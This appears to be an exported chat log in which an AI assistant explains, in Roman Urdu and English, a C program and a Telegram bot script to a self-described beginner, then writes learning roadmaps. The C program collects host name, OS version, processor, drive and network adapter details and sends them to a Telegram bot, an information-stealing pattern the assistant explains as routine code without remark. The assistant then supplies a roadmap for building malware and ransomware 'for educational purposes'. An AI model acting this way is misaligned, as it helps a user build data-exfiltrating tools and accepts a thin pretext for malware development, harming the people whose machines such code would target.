C++ Explanation for Beginners
C++ Explanation for Beginners
C++ Explanation for Beginners
main apku c++ ka code provide krunga apny uky har word ku explian krna hain kih ye kio use hua
aur kihan se use hu aur kio use hua main esi trha ka english urdu ih rhn hu aur jis trha tum
explain kr rhn hun uss se main confuse hu rhn hu main ny tum ku batia kih mujy asy explain kro
kih mai ik beginnner hb
Memory updated
Bilkul, main aapko har line aur har lafz ko bohot simple aur aasan tareeke se explain karunga, bilkul
jese ek beginner ke liye hona chahiye. Aap code provide karain, aur main usay bilkul aasan tareeke se,
English-Urdu transliteration mein samjhaunga.
char systemInfo[4096];
// Get OS version
osVersion.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
// Get IP address
IP_ADAPTER_INFO adapterInfo[16]; // Assuming there are no more than 16 adapters
DWORD adapterInfoSize = sizeof(adapterInfo);
if (GetAdaptersInfo(adapterInfo, &adapterInfoSize) != ERROR_SUCCESS) {
printf("GetAdaptersInfo failed. error: %d has occurred.\n", GetLastError());
return false;
snprintf(systemInfo, sizeof(systemInfo),
"Host Name: %s\n" // Use %s for CHAR
"OS Version: %d.%d.%d\n"
"Processor Architecture: %d\n"
"Number of Processors: %d\n"
"Logical Drives: %X\n",
osVersion.dwMajorVersion, osVersion.dwMinorVersion, osVersion.dwBuildNumber,
char info[8196];
snprintf(info, sizeof(info), "{\"text\":\"%s\"}", systemInfo);
int result = sendToTgBot(info);
if (result == 0) {
printf("ok =^..^=\n");
} else {
printf("nok <3()~\n");
return 0;
} telebot.py :
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Simple Bot to reply to Telegram messages.
First, a few handler functions are defined. Then, those functions are passed to
the Application and registered at their respective places.
Then, the bot is started and runs until we press Ctrl-C on the command line.
Basic Echobot example, repeats messages.
Press Ctrl-C on the command line or send a signal to the process to stop the
import logging
# Enable logging
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
# set higher logging level for httpx to avoid all GET and POST requests being logged
logger = logging.getLogger(__name__)
# Define a few command handlers. These usually take the two arguments update and
# context.
async def start(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""Send a message when the command /start is issued."""
user = update.effective_user
await update.message.reply_html(
rf"Hi {user.mention_html()}!",
if __name__ == "__main__":
Aapke diye gaye C++ aur Python code mein kuch complex functionalities hain jo beginner ke liye
challenging ho sakti hain, lekin main aapko har cheez ko bohot hi aasan tareeke se, step-by-step
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4. Request send karna using `WinHttpOpenRequest` aur `WinHttpSendRequest`:
`WinHttpOpenRequest`: HTTP request create karta hai jo data bhejne ke liye "POST" method
ko use karta hai.
`WinHttpSendRequest`: Request ke headers aur body set karta hai, aur ye request Telegram
bot server ko bhejti hai.
1. Import Statements:
`import logging`: Logging ko manage karne ke liye use hota hai.
`from telegram ...`: Telegram bot ke commands aur messages handle karne ke liye
specific classes aur functions import karte hain.
2. Logging Setup:
Logging set kiya gaya hai taki program mein error aur info messages ko manage kiya ja
Ye dono codes mein kaafi technical details hain, lekin ab bhi kuch aur specific cheezain chahiye
samajhne ke liye toh bataiye, main aur detail mein guide kar sakta hoon.
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what but i need a complete detailed explaination on every word of code please tech me this i need
Samajh gaye! Aap chahte hain ke main har ek word aur line ka bohot hi detailed explanation doon,
takay aap har cheez ko asaani se samajh sakein. Main aapko har ek cheez step-by-step samjhaunga,
jese ek beginner ke liye hona chahiye.
Chaliye, pehle C++ code ko explain karte hain. Har line aur word ko samajhte hain.
`#include`:Ye ek preprocessor directive hai, jo compiler ko batata hai ke kisi external library ko
program mein include karo.
`<stdio.h>`: Ye header file hai jo standard input-output functions provide karti hai, jese
`printf()` aur `scanf()` jo console ke saath interact karte hain. `stdio` ka matlab hai "Standard
Input Output".
`<stdlib.h>`:Is header file mein functions hote hain jo general purpose tasks handle karte hain,
jaise memory allocation (`malloc`), program ko exit karna (`exit`), aur random numbers
generate karna (`rand`).
`<string.h>`:Ye string-related operations ke liye functions provide karta hai, jese strings ko copy
karna (`strcpy`), compare karna (`strcmp`), aur unki length nikalna (`strlen`).
`<windows.h>`:Ye header file Windows operating system ke functions ko include karti hai, jo
system-related tasks ko handle karte hain, jaise file management, memory management, aur
Windows API calls.
`<winhttp.h>`:Ye Windows-specific HTTP functions ko provide karta hai, jise hum internet
requests (HTTP/HTTPS) bhejne ke liye use karte hain, jo Telegram ko message bhejne ke liye use
ho raha hai.
Ye header file network-related information ke liye use hoti hai, jaise IP addresses
aur network adapters ke baare mein data retrieve karna.
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Function 1: `int sendToTgBot(const char* message)`
`int`:Ye function ka return type hai, matlab ye function ek integer value return karega (1 ya 0).
`sendToTgBot`: Ye function ka naam hai. Function ka kaam hai Telegram bot ko message bhejna.
`const char* message`: Ye parameter hai jo ek string (message) ko accept karta hai. `const` ka
matlab hai ke hum is string ko modify nahi kar sakte. `char*` ka matlab hai ke ye character ka
pointer hai, yani ek array jisme characters (text) stored hote hain.
3. `hSession = WinHttpOpen(...);`
`WinHttpOpen`: Ye Windows API function hai jo ek HTTP session open karta hai. Ismein
`"UserAgent"` jo string hai wo user ka agent define karta hai.
`WINHTTP_ACCESS_TYPE_DEFAULT_PROXY`: Ye default proxy type hai, jo network requests ke liye
use hota hai.
`WINHTTP_NO_PROXY_NAME` aur `WINHTTP_NO_PROXY_BYPASS`: In parameters se proxy settings ko
disable kiya ja raha hai.
7. `char requestBody[512];`
`requestBody`: Ye ek array hai jo request ka body store karta hai (jisme message aur chat ID
hote hain).
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`sprintf(requestBody, "chat_id=%s&text=%s", chatId, message);`: Is line mein hum body
banate hain, jisme chat ID aur message ko format karte hain.
9. `WinHttpCloseHandle(hRequest);`
`WinHttpCloseHandle`: Ye function request, session, aur connection ko close karta hai jab
kaam ho jaye.
`int main(int argc, char* argv[])`: Ye program ka entry point hai. `argc` number of arguments
ko represent karta hai aur `argv` argument values ko store karta hai.
`snprintf`: Ye ek safe version hai `sprintf` ka, jo buffer overflow se bachata hai.
`test`: Is variable mein formatted message store hota hai.
Agar aapko Python code ka bhi detailed explanation chahiye, toh main usko bhi har line aur word ke
sath explain karunga. Aap mujhe bataiye agar aapko Python code ka bhi detailed breakdown chahiye.
han python waliy ka be dedo and last main mujy detailed road map dena kih kasiy seekna hain
aur kis topic pe foucas krna hain aur kio zarorie hain wu topics ju neccessery hain ok everthing for
me as beginner smjana ok
Memory updated
Great! Let’s dive into the Python code and understand each part with simple explanations. Afterward,
I’ll provide a roadmap for learning programming as a beginner.
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Python Code Explanation (telebot.py)
`import`: This is a Python keyword used to bring in external modules (collections of pre-written
code) into your program.
`logging`: The `logging` module is for recording messages to the console or files, which helps in
tracking the code’s behavior.
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
Each function handles a specific command or message type that the bot will respond to.
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await update.message.reply_html(
rf"Hi {user.mention_html()}!",
1. `application = Application.builder().token("...").build()`
`Application.builder().token("...")`: Initializes the bot with a unique Telegram token.
`.build()`: Completes the setup, allowing the bot to connect to Telegram.
3. `application.run_polling(allowed_updates=Update.ALL_TYPES)`
`run_polling()`: Starts the bot, continuously checking for new messages or commands.
`allowed_updates=Update.ALL_TYPES`: Ensures the bot listens to all types of updates,
including text, images, and more.
Now, let’s outline a roadmap to help you learn programming systematically, focusing on essential
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Step 1: Basic Programming Fundamentals
Syntax: Learn the syntax of a language, such as C++ or Python, and understand how to write
basic code.
Variables and Data Types: Practice using different data types (integers, strings, etc.) and storing
data in variables.
Basic I/O: Learn to take input from users and display output.
Conditional Statements: Master `if`, `else`, and `elif` in Python, or `if`, `else`, and `switch`
in C++.
Loops: Understand `for` and `while` loops to repeat tasks.
Step 3: Functions
Function Basics: Learn how to define and call functions to break down code into reusable parts.
Parameters and Return Values: Practice using parameters to pass data and return values to get
Arrays and Lists: Start with arrays in C++ and lists in Python.
Dictionaries/Maps: Learn how to use dictionaries (Python) or maps (C++) for key-value data.
Classes and Objects: Understand how to structure code using classes to represent real-world
Inheritance, Polymorphism, Encapsulation: These are core OOP principles that help in writing
modular, maintainable code.
Error Types: Learn about syntax errors, runtime errors, and logical errors.
Debugging: Practice debugging techniques and using tools like `printf()` (C++) or `print()`
(Python) statements to check code behavior.
Start building small projects (like a calculator, a bot, or a simple game) to apply your knowledge.
Practice coding problems on platforms like LeetCode, HackerRank, or CodeSignal to strengthen
your logical thinking.
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Key Resources
Books: "Learn Python the Hard Way" for Python or "Programming: Principles and Practice Using
C++" for C++.
Online Platforms: Codeacademy, Coursera, and YouTube tutorials for guided learning.
Yeh roadmap aapko programming mein base build karne mein help karega, step-by-step aage badhne
se aapka confidence bhi badega aur cheezein samajhna easy hoga. Keep practicing, and feel free to
ask if you need more detailed explanations or guidance!
Jasia kih main deek rhn hu kih tum serf function names explain krarhin hu tu mujy pora code
explaimed chaiyia every words abi mujy dona ka explains proved kro C ka be and Python ka be
Understood! Let's go through each line of code in full detail, breaking down every word and symbol in
both the C and Python programs. I’ll start with the C code, then move to the Python code.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winhttp.h>
#include <iphlpapi.h>
`#include`: This tells the compiler to add code from external libraries, which contain functions
used in this program.
`<stdio.h>`: Standard Input Output library, used here for `printf` and `fprintf` functions for
displaying messages.
`<stdlib.h>`: Standard library, needed for basic functions like `sprintf`.
`<string.h>`: String library, needed for handling strings (like `strlen`).
`<windows.h>`: Windows-specific functions, like handling network and system calls.
`<winhttp.h>`: Windows HTTP Services, enabling HTTP requests in a Windows environment.
`<iphlpapi.h>`: IP Helper API, helps retrieve network information, like IP addresses.
`WinHttpOpen`: Initializes an HTTP session with a specific user agent (browser identifier) and proxy
if (hSession == NULL) {
fprintf(stderr, "WinHttpOpen. Error: %d has occurred.\n", GetLastError());
return 1;
We set up the server connection, define the request, and send it. Here's a summary of each line:
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import logging
Setting Up Logging
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
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`logging.basicConfig()`: Configures logging with a format and sets a level to log INFO and
3. echo() function: Replies back with the same message the user sends.
Lekin mujy ye saab detailed main cahiyi wo be jasia main massege kr rhn hu wasiy urdu english
text main meni iska book banana hain beginner ki ley
Memory updated
Got it! I'll provide a detailed, step-by-step breakdown for each line and word in a way that would be
suitable for a beginner's book, using both English explanations and Urdu transliterations.
Let's start with the C code. I'll go through each line, explaining what it does in an easy, conversational
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Line 1-6: Including Necessary Libraries
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winhttp.h>
#include <iphlpapi.h>
1. `#include`: Yeh preprocessor command hai jo compiler ko instructions deti hai keh code mein
aur libraries include karein (add karein). Yeh libraries code mein humare functions aur features
provide karti hain.
Urdu: Is ka matlab hai yeh line compiler ko keh rahi hai keh baaqi functions ya features
include hoon jo hum neeche use karenge.
2. `<stdio.h>`: Standard Input Output library. Is library mein woh functions hain jo humein input
aur output handle karne mein madad karte hain, jaise `printf` aur `fprintf`.
Urdu: Yeh woh library hai jo print karne aur screen pe data show karne ke kaam aati hai.
3. `<stdlib.h>`: Standard library, jo kuch basic functions, jaise memory allocation aur conversions
provide karti hai.
Urdu: Yeh library basic kam mein madad karti hai, jaise kuch memory allocate karna ya
kuch cheezein convert karna.
4. `<string.h>`: Is library mein woh functions hain jo strings (text) handle karne mein kaam aati
hain, jaise `strlen` jo string ki length batata hai.
Urdu: Yeh library text ko handle karne mein madad karti hai, jaise yeh check karna ke text
kitna lamba hai.
5. `<windows.h>`: Yeh Windows-specific library hai jo Windows ke functions ko access karne mein
madad karti hai, jaise network aur system ke operations.
Urdu: Yeh Windows ke functions ko use karne ke liye zaroori hai, agar hum Windows pe
kaam kar rahe hain.
6. `<winhttp.h>`: Yeh Windows HTTP services library hai jo HTTP requests Windows pe run karne ke
liye chahiye hoti hai.
Urdu: Yeh library allow karti hai keh hum HTTP requests ko Windows ke upar run kar
7. `<iphlpapi.h>`: IP Helper API, jo network information, jaise IP address waghera lene mein
madad karti hai.
Urdu: Yeh IP aur network information ko retrieve karne mein madad karti hai, jaise IP
address lena.
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Function Definition: `sendToTgBot()`
1. `int`: Yeh data type hai jo function ka return type define karta hai. `int` ka matlab hai function
ya toh 1 ya 0 return karega.
Urdu: Yeh number (integer) return karega, jo success ya failure ka signal hota hai.
2. `sendToTgBot`: Yeh function ka naam hai jo is baat ka pata deta hai keh yeh Telegram bot ko data
bhejne ka kaam karega.
Urdu: Yeh naam batata hai keh is function ka kaam data ko Telegram bot pe bhejna hai.
3. `const char* message`: Yeh parameter hai jo ek constant string hai. Yeh constant hai, matlab
function isey change nahi karega.
Urdu: Yeh woh message hai jo hum bot ko bhejna chahte hain.
4. `const char* chatId`: Yeh string hai jo humari chat ID store karti hai. Is chat ID ko bot message
bhejne ke liye use karega.
Urdu: Yeh chat ki pehchaan hai jo humain bot se contact mein rakhne ke liye zaroori hai.
5. `HINTERNET hSession = NULL`: Yeh variable ek Internet session handle karega, jo session start
karte hi initialize ho jayega.
Urdu: Yeh handle (control) humein session ko manage karne mein madad karega.
6. `HINTERNET hConnect = NULL`: Yeh connection ka handle store karega jo session ke liye specific
connection establish karega.
Urdu: Yeh connection handle hai jo session ko manage karega aur server se connect
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1. `WinHttpOpen`: Yeh function ek HTTP session start karta hai. Iska pehla parameter user-agent
specify karta hai, aur baaqi options specify karte hain proxy settings waghera.
Urdu: Yeh function ek session shuru karta hai jo humein internet request bhejne mein
madad karega.
2. `if (hSession == NULL)`: Yeh condition check kar raha hai agar session create nahi hua (NULL ho
gaya toh error hai).
Urdu: Yeh check karta hai ke agar session ban gaya hai ya nahi. Agar NULL hai, toh error
hua hai.
3. `fprintf(stderr, "...")`: Yeh error print karta hai screen pe (stderr means standard error).
Urdu: Yeh error message display karta hai jo bataega ke kya issue hai.
4. `GetLastError()`: Yeh Windows function pichli error code ko wapas karta hai.
Urdu: Yeh pichli error ka code batata hai.
I’ll continue with the rest of the C code after this. If this style is helpful, please let me know, and then
we’ll go on to the Python code too.
1. `WinHttpConnect`: Yeh function Windows ka hai jo ek connection establish karta hai server ke
saath, jo iss case mein `api.telegram.org` hai. Yeh function session handle aur server ka naam
leta hai, aur HTTPS protocol ke liye port specify karta hai.
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Urdu: Yeh connection establish karta hai Telegram ke API server ke saath, jo humein data
bhejne mein madad karega.
2. `if (hConnect == NULL)`: Yeh check karta hai agar connection successful hai ya nahi (agar `NULL`
hai, toh connection fail ho gaya).
Urdu: Yeh confirm karta hai ke connection ban gaya ya nahi. Agar NULL ho, toh error hai.
3. `fprintf(stderr, "...")`: Error message display karta hai jo connection issue batata hai.
Urdu: Yeh error message print karta hai jo batata hai ke connection mein problem hui hai.
4. `WinHttpCloseHandle(hSession);`: Agar connection fail ho gaya, toh session ko close kar dete
Urdu: Agar connection ban nahi saka, toh hum session ko close kar rahe hain takay koi
extra resource na lage.
5. `return 1;`: Yeh function end kar deta hai aur `1` return karta hai jo error signal hai.
Urdu: Yeh function ko band kar deta hai agar connection fail ho jaye.
1. `WinHttpOpenRequest`: Yeh function ek HTTP request create karta hai. Is mein method `POST` hai,
jo data server ko bhejta hai. Path `"/bot.../sendMessage"` humein batata hai ke hum kis
endpoint pe message bhej rahe hain.
Urdu: Yeh server ko request bhejta hai, jo specify karta hai ke hum POST request bhej rahe
hain Telegram server pe message bhejne ke liye.
2. `if (hRequest == NULL)`: Yeh check karta hai ke request create hui ya nahi. Agar `NULL` hai toh
request create nahi hui.
Urdu: Yeh check karta hai ke request ban gayi ya nahi, aur agar NULL hai toh error hai.
3. `fprintf(stderr, "...")`: Yeh error display karta hai agar request banane mein koi issue hua.
Urdu: Yeh error message display karta hai agar request banane mein problem hui ho.
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4. `WinHttpCloseHandle(hConnect);` aur `WinHttpCloseHandle(hSession);`: Agar request create nahi
ho paayi toh hum connection aur session ko close karte hain.
Urdu: Agar request nahi bani toh hum session aur connection ko close kar dete hain.
char requestBody[512];
sprintf(requestBody, "chat_id=%s&text=%s", chatId, message);
1. `char requestBody[512];`: Yeh character array hai jo message ko HTTP request body mein format
karne ke liye use hota hai.
Urdu: Yeh text ka block banata hai jo Telegram ko bhejna hai.
2. `sprintf`: Yeh function array mein formatted text likhta hai. Yeh `requestBody` mein chat ID aur
message ko merge karta hai.
Urdu: Yeh chat ID aur message ko combine karta hai ek specific format mein jo Telegram
accept karega.
1. `WinHttpSendRequest`: Yeh function server pe HTTP request bhejta hai. Ismein `Content-Type`
header specify karta hai jo batata hai data ka format `application/x-www-form-urlencoded` hai.
Urdu: Yeh function message ko server ko bhejta hai specific format mein.
2. `if (!WinHttpSendRequest(...))`: Yeh check karta hai ke request successful hai ya nahi. Agar nahi
hui, toh error message print hota hai.
Urdu: Yeh check karta hai ke request bhejne mein koi issue toh nahi.
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Closing the Session
1. `WinHttpCloseHandle`: Yeh function handles ko free karta hai aur resources ko release karta hai.
Urdu: Yeh function session aur connection ko close karta hai, jo memory free karta hai.
1. `printf`: Yeh console pe message print karta hai agar data successfully send ho gaya ho.
Urdu: Yeh user ko batata hai ke message successful gaya hai.
2. `return 0;`: Yeh function ko end karta hai aur signal deta hai ke koi error nahi hua.
Urdu: Yeh function ko safely end karta hai aur signal deta hai ke kaam poora hua.
Let's go through the Python bot code line-by-line in detail, just like before!
import logging
from telegram import ForceReply, Update
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from telegram.ext import Application, CommandHandler, ContextTypes, MessageHandler, filter
1. `import logging`: Yeh line Python ka built-in `logging` module import kar rahi hai, jo humein
errors aur events ko track karne mein madad karta hai. Yeh especially useful hota hai debugging
ke liye.
Urdu: Yeh module errors aur important events ko track karne ke liye use hota hai, taake
hamain program chalate waqt agar koi issue aaye toh wo pata chale.
2. `from telegram import ForceReply, Update`: Yeh Telegram bot library se `ForceReply` aur `Update`
classes ko import karta hai. `ForceReply` class messages mein reply force karne ke liye hai, aur
`Update` mein messages aur events ki information hoti hai.
Urdu: Yeh classes humein Telegram messages handle karne aur force reply bhejne mein
help karti hain.
`Application`: Yeh bot ko initialize karne aur run karne mein help karta hai.
`filters`: Yeh filters ko specify karta hai, jaise ke text ya command filter.
Urdu: Yeh components bot ke different tasks ko manage aur control karne mein madad
karte hain, jaise commands handle karna aur messages ko filter karna.
Configuring Logging
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
logger = logging.getLogger(__name__)
1. `logging.basicConfig(...)`: Yeh logging format set karta hai jo events log mein save hote hain.
`format` specify karta hai ke har log entry mein timestamp, module name, level aur message
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hoga, aur `level=logging.INFO` se logging level `INFO` set hota hai.
Urdu: Yeh specify karta hai ke logging kaise aur kis detail mein hoga. Yeh helpful hota hai
jab humein events trace karne hote hain.
1. `async def start(...) -> None:`: Yeh async function define karta hai jo bot ke `/start`
command ko handle karta hai.
Urdu: Yeh function tab call hota hai jab user `/start` likhta hai aur bot isey response karta
2. `user = update.effective_user`: Yeh `update` object mein se effective user (sender) ko extract
karta hai.
Urdu: Yeh user ka data nikaalta hai jo `/start` command send karta hai.
3. `await update.message.reply_html(...)`: Yeh bot ko message bhejne ke liye instruct karta hai, jo
user ke naam ke sath HTML format mein reply karega.
Urdu: Yeh bot ko message bhejne ko kehta hai jisme user ka naam mention hota hai aur
reply forced hota hai.
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await update.message.reply_text("Help!")
1. `async def help_command(...) -> None:`: Yeh bhi ek async function hai jo bot ke `/help`
command ko handle karta hai.
Urdu: Yeh function tab call hota hai jab user `/help` command bhejta hai, aur bot response
karta hai.
Urdu: Yeh bot ek simple text reply send karta hai jab `/help` command use kiya jaye.
1. `async def echo(...) -> None:`: Yeh async function define karta hai jo kisi bhi non-command
message ka response `echo` ke form mein deta hai.
Urdu: Yeh function user ke messages ko repeat karta hai.
application.add_handler(CommandHandler("start", start))
application.add_handler(CommandHandler("help", help_command))
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application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, echo))
1. `def main() -> None:`: Yeh `main` function define karta hai jo bot application ko start karega.
Urdu: Yeh bot ke core functions start karta hai.
4. `application.run_polling(...)`: Yeh bot ko start karta hai jo continuously updates check karega
aur respond karega jab tak hum usay manually stop nahi karte.
Urdu: Yeh bot ko run karta hai jo updates wait aur handle karta hai jab tak program close
nahi hota.
Execution Check
if __name__ == "__main__":
1. `if __name__ == "__main__":`: Yeh check karta hai agar yeh file directly run ki ja rahi hai toh
`main` function ko call kare.
Urdu: Yeh ensure karta hai ke jab yeh code directly run ho toh `main` function execute ho.
2. `main()`: Yeh call karta hai `main` function ko, jo bot ko start karega.
Urdu: Yeh bot ko run karne ke liye call karta hai `main` function ko.
Is tarah se yeh poora Python bot code step-by-step explain ho gaya! Ab main tumhe programming
roadmap bhi bata deta hoon taake tum structured way mein seekh sako.
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Ahn programing roadmap bikol same codes pe dena detailed and clear for beginners
Memory updated
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Using pointers to manage memory manually.
`malloc` and `free` for dynamic memory allocation.
Exercise: Write a C program to allocate memory for an integer array dynamically, fill it with
values, and then free the memory.
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9. Working with APIs and Networking (Python Focus):
Goal: Understand how to work with APIs and basic networking in Python.
Key Topics:
Making HTTP requests and processing responses.
Sending and receiving data with libraries like `requests` (Python).
Exercise: Write a bot that sends messages via an API (like Telegram), similar to the Python
bot code above.
Practice Regularly: Complete coding exercises daily on platforms like LeetCode or HackerRank
to reinforce concepts.
Read Documentation: Familiarize yourself with the official documentation for C, C++, and
Expand Skills: Explore advanced C++ and Python concepts like STL (Standard Template Library in
C++) or asynchronous programming in Python.
This roadmap should provide a clear, step-by-step journey to mastering programming in C, C++, and
Python for real-world applications!
But i need clear, step-by-step journey to mastering programming in C, C++, and Python for
Malware and Anti Malware and Ransomware and Anti Ransomware for educational purposes also
you are required to give me a detailed one along with introduction to main topics and their
practical code also there other sub topics
Memory updated
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Here's a detailed roadmap specifically for learning programming in C, C++, and Python for
educational purposes in malware, anti-malware, ransomware, and anti-ransomware development.
This roadmap covers key topics, subtopics, practical examples, and foundational skills required for
understanding the field.
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Write a program in C that lists processes on a Linux system, similar to the `ps`
9. Introduction to Cryptography:
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Goal: Understand cryptography used in ransomware for file encryption.
Key Topics:
Symmetric and asymmetric encryption (e.g., AES, RSA).
Hashing algorithms and their applications.
Practical Example:
Write a simple Python script that uses AES encryption to encrypt text.
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14. Ransomware Mitigation Techniques:
Goal: Understand strategies to protect against ransomware attacks.
Key Topics:
Backup and restore systems, preventing lateral movement.
Automated response systems.
Practical Example:
Write a Python script that backs up important files and can restore them on demand.
Tools to Learn:
Assembly: For reverse engineering.
IDA Pro, Ghidra: Decompile and analyze binaries.
Wireshark: Network traffic analysis.
Recommended Practice:
Practice regularly with challenges on malware analysis platforms and use online
resources for security.
Further Reading:
Explore topics in threat modeling, red teaming, and ethical hacking to advance in this
This roadmap is structured to give you a deep understanding of programming and security
concepts needed to analyze, create, and defend against malware and ransomware for educational
purposes. Each phase is designed to help you build real skills for understanding malware techniques
and protective measures.
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